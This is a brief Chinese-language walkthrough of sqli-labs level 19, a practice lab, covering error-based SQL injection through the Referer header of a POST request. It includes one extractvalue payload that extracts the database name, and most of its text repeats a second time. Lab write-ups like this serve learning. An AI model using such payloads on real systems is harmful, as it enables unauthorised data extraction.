sqli-labs第十九关——POST-referer注入
一:判断注入类型
同理前一关,bp抓包
这里尝试referer注入
判断流程和前一关一样sqli-labs第十八关——POST-UA注入-CSDN博客
单引号,尝试报错注入
二:开始注入
1.爆数据库名
Referer: 1' and extractvalue(1,concat(0x7e,(database())))='1
与前一关相同,不再过多赘述
同理前一关,bp抓包
这里尝试referer注入
判断流程和前一关一样sqli-labs第十八关——POST-UA注入-CSDN博客
单引号,尝试报错注入
Referer: 1' and extractvalue(1,concat(0x7e,(database())))='1
与前一关相同,不再过多赘述